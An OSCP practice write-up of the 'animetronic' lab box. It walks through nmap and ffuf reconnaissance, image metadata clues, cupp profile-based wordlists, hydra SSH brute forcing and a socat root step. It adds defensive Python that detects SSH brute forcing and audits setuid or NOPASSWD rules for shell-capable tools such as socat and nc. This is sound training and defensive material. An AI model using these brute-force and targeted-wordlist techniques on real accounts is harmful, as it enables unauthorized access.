OSCP Practice Box
Box overview
Box | Difficulty | Skills covered
animetronic | easy | information gathering, image steganography, cupp usage, social-engineering wordlist generation, SSH brute forcing, socat privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.31.0/24
Port scanning
└─# nmap -sV -A -p- -T4 192.168.31.187
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-11 12:13 EST
Nmap scan report for 192.168.31.187
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_ 256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Animetronic
MAC Address: 08:00:27:B8:CD:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.31.187
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds
Directory scanning
The scan turns up a staffpages directory; fuzzing one level below it finds new_employees, which serves a single image.
┌──(root㉿kali)-[~]
└─# ffuf -u http://192.168.31.187/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -e .php,.txt,.js,.html -fs 2384
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.31.187/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .js .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 2384
________________________________________________
[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: .php
[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: .html
[Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]
* FUZZ: img
[Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: css
[Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: js
[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]
* FUZZ: .php
[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4ms]
* FUZZ: .html
[Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: staffpages
[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
* FUZZ: server-status
:: Progress: [1102800/1102800] :: Job [1/1] :: 13333 req/sec :: Duration: [0:01:35] :: Errors: 0 ::
ffuf -u http://192.168.31.187/staffpages/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -e .php,.txt,.js,.html -fs 2384
Download the image and read its hidden metadata with exiftool. Decoding it yields ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן, which read the other way up is message_for_michael.
exiftool new_employees.jpeg
http://192.168.31.187/staffpages/message_for_michael
Visiting that path gives a personal_info.txt, which reveals the username Michael.
Gaining access
Brute forcing with hydra and the rockyou.txt wordlist fails. Generating a social-engineering wordlist with cupp and running hydra again succeeds and yields the account's password.
hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.31.187
└─# cupp -i
cupp.py! # Common User Passwords Profiler
[ Muris Kurgas | [email protected] ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: michael
> Surname:
> Nickname:
> Birthdate (DDMMYYYY): 19101996
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: y
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 1510 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
hydra -l michael -P michael.txt ssh://192.168.31.187
With the password in hand, log in over SSH as michael.
Privilege escalation
In henry's home directory we get the flag, along with a note.txt hint that leads to that account's password.
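From the blue-team side, the two hydra runs above leave a very recognisable trace: hundreds of "Failed password" entries for one user from one source, followed by an "Accepted password" from that same source. The detector below is an added example, not part of the original write-up. It counts failures per (source, user) in a sliding time window over sshd log lines in the Debian/Ubuntu auth.log format and raises a second alert when a success follows the failures; the log lines, the source address and the thresholds are constructed for illustration.

```python
# Added example (not from the original write-up): flag SSH password guessing
# such as the hydra runs above by counting failed logins per source/user in a
# sliding window, then flag a success that follows them. Sample log lines are
# constructed in the usual auth.log format, not captured from the box.
import re
from collections import defaultdict, deque
from datetime import datetime

# Typical sshd messages for failed and successful password logins.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_ts(ts: str, year: int = 2024) -> datetime:
    # auth.log timestamps carry no year; assume one so windows can be compared.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold: int = 10, window_s: int = 60):
    """Return a list of alert tuples.

    ("bruteforce", src, user, n)  when n == threshold failures for that
        source/user land inside window_s seconds (fires when the window fills);
    ("success_after_failures", src, user, total_failures) when an accepted
        login arrives from a source that already reached the threshold.
    """
    recent = defaultdict(deque)  # (src, user) -> timestamps of recent failures
    failures = defaultdict(int)  # (src, user) -> total failures seen
    alerts = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            key = (m["src"], m["user"])
            t = parse_ts(m["ts"])
            q = recent[key]
            q.append(t)
            while q and (t - q[0]).total_seconds() > window_s:
                q.popleft()  # drop failures that fell out of the window
            failures[key] += 1
            if len(q) == threshold:
                alerts.append(("bruteforce", m["src"], m["user"], len(q)))
            continue
        m = ACCEPT_RE.match(line)
        if m and failures[(m["src"], m["user"])] >= threshold:
            alerts.append(("success_after_failures", m["src"], m["user"],
                           failures[(m["src"], m["user"])]))
    return alerts


# Constructed sample: 12 rapid failures for michael from one address, then a
# success from the same address, then an unrelated single failure elsewhere.
SAMPLE_LOG = [
    f"Feb 11 12:30:{i:02d} animetronic sshd[{1000 + i}]: Failed password for "
    f"michael from 192.168.31.50 port {40000 + i} ssh2"
    for i in range(12)
] + [
    "Feb 11 12:30:13 animetronic sshd[1013]: Accepted password for michael "
    "from 192.168.31.50 port 40013 ssh2",
    "Feb 11 12:31:00 animetronic sshd[1020]: Failed password for invalid user "
    "admin from 192.168.31.77 port 50000 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately low so the constructed sample trips them; on a real host the "success_after_failures" alert is the one worth paging on, since the brute-force alert alone fires on every scanner that passes by.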
find / -type f -name "henrypassword.txt" 2>/dev/null
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam
Use socat to escalate to root and read the root.txt flag.
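The write-up only says that socat was the way to root and does not show how it was exposed, so the check below stays on the defensive side: a small audit that flags setuid binaries and NOPASSWD sudo rules handing out tools that can relay file descriptors or spawn a shell, socat among them. This is an added example, not the author's or the box's code; the watch list, the sample file modes and the sudoers lines are constructed, and the live filesystem walk is optional.

```python
# Added example (not from the original write-up): audit a host for the two
# usual ways a tool like socat ends up running as root, a setuid bit or a
# NOPASSWD sudo rule. Watch list and sample inputs are constructed.
import os
import re
import stat

# Binaries that, when run privileged, commonly hand over a root shell or
# arbitrary file access. Constructed starter list; extend with a site policy.
WATCHLIST = {"socat", "nc", "ncat", "bash", "sh"}


def risky_setuid(entries):
    """entries: iterable of (path, st_mode). Return the paths that carry the
    setuid or setgid bit and whose basename is on the watch list."""
    hits = []
    for path, mode in entries:
        privileged = bool(mode & (stat.S_ISUID | stat.S_ISGID))
        if privileged and os.path.basename(path) in WATCHLIST:
            hits.append(path)
    return hits


def collect_modes(roots=("/usr/bin", "/usr/sbin", "/usr/local/bin")):
    """Live check: yield (path, st_mode) for regular files under the roots."""
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    yield path, st.st_mode


# user  host=(runas) [TAG:] command[, command...]   (simplified sudoers grammar)
SUDO_RULE = re.compile(
    r"^\s*(?P<who>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def risky_sudo_rules(sudoers_text: str):
    """Return (user, command) pairs for NOPASSWD rules whose command is on the
    watch list. Comments and non-matching lines are ignored."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in WATCHLIST:
                hits.append((m["who"], cmd))
    return hits


# Constructed samples: one setuid socat beside a legitimate setuid passwd,
# and one NOPASSWD rule for socat beside an ordinary password-required rule.
SAMPLE_ENTRIES = [
    ("/usr/bin/socat", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/ls", 0o100755),
]
SAMPLE_SUDOERS = (
    "# constructed sample\n"
    "michael ALL=(ALL) NOPASSWD: /usr/bin/socat\n"
    "henry   ALL=(ALL) ALL\n"
)

if __name__ == "__main__":
    print("setuid hits (sample):", risky_setuid(SAMPLE_ENTRIES))
    print("sudo hits (sample):", risky_sudo_rules(SAMPLE_SUDOERS))
    print("setuid hits (this host):", risky_setuid(collect_modes()))
```

Either hit is a finding on its own; the fix is the same in both cases, remove the bit or the rule and, if the relay is genuinely needed, grant it through a wrapper that fixes the arguments rather than the bare binary.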
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】animetronic